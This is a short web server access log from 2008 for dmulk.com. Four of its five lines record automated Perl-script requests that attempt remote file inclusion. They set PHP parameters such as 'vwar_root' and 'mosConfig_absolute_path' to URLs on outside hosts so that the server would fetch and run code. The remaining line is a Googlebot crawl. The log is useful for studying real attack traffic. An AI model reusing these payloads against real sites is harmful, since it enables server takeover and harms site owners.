163.17.62.3 - - [24/Jul/2008:07:24:25 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:07:24:25 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:07:24:35 -0700] "GET /blog/?nggpage=3&pageid=17 HTTP/1.1" 200 18296 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:24:42 -0700] "GET /logs/access_080212.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.207.244 - - [24/Jul/2008:07:24:43 -0700] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 18573 "-" "libwww-perl/5.812" "www.dmulk.com"
